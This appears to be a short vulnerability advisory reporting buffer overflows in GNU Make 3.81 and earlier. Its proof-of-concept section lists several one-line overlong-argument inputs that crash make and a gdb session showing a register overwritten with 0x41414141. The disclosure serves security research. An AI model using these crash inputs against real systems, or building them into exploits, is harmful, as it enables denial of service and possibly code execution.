make multiple buffer overflow

[laurent gaffie]

Application: Make <= 3.81
Web Site: http://savannah.gnu.org/projects/make/ & http://www.gnu.org/software/make/
 
Platform: Unix
Bug:multiple buffer overflow

-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Greets
5) Credits
===========
1) Introduction
===========

Make is a tool which controls the generation of executables and other
non-source files of a program from the program's source files.

Make gets its knowledge of how to build your program from a file
called the makefile, which lists each of the non-source files and how
to compute it from other files. When you write a program, you should
write a makefile for it, so that it is possible to use Make to build
and install the program. 

======
2) Bug
======
Make doesn't filter any value submitted by cmd line, then it is possible to trigger some exploitable buffer overflow

=====
3)Proof of concept
=====

Proof of concept example :
make `perl -e 'print"A"x4096'` //***
make -f `perl -e 'print"A"x4096'`
make -j `perl -e 'print"A"x4096'`
make -i `perl -e 'print"A"x4096'`
make -l `perl -e 'print"A"x4096'`

*** depending the case , you'll need to change  the value ,  for a couple of more  A , playing by  hundred should be good to make sure you trigger it

address@hidden:~# gdb make
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
.................
..........
...
(gdb) run `perl -e 'print"A"x4296'`//my GCC version have a protection for stack smashing then 200 chars more , and we trigger it
Starting program: /usr/bin/make `perl -e 'print"A"x4296'`
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1209637200 (LWP 1246)]
make: stat: AAAAAAAAAAAAAAAAAAAAAAAA....AAAAAAA
AAAAA.........AAAAAAAAAA....
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1209637200 (LWP 1246)]
0x08052ac5 in ?? ()
(gdb) i r 
eax            0xbfffa930       -1073764048
ecx            0x0      0
edx            0x0      0
ebx            0x41414141       1094795585 //got overwritted here
esp            0xbfff8570       0xbfff8570
ebp            0xbfffa918       0xbfffa918
esi            0x80868f8        134768888
edi            0x8081560        134747488
eip            0x8052ac5        0x8052ac5 <address@hidden>
eflags         0x10206  [ PF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb)  

========
4)Greets
========
Deimos,Benjilenoob,team soh, #futurezone, #soh #nibbles 

=====
5)Credits
=====
mwoa!